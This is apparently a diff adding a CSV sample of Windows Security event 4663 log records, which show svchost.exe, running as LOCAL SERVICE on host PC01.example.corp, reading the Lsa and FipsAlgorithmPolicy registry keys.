+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452891
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452890
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452889
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452888
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452887
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452886
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452885
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452884
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452883
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452882
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452881
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452880
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452879
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452878
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452877
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452876
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452875
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452874
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452873
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452872
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452871
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452870
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452869
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452868
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452867
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452866
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452865
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452864
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452863
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452862
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452861
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452860
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452859
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452858
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452857
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452856
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452855
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452854
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452853
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452852
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452851
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
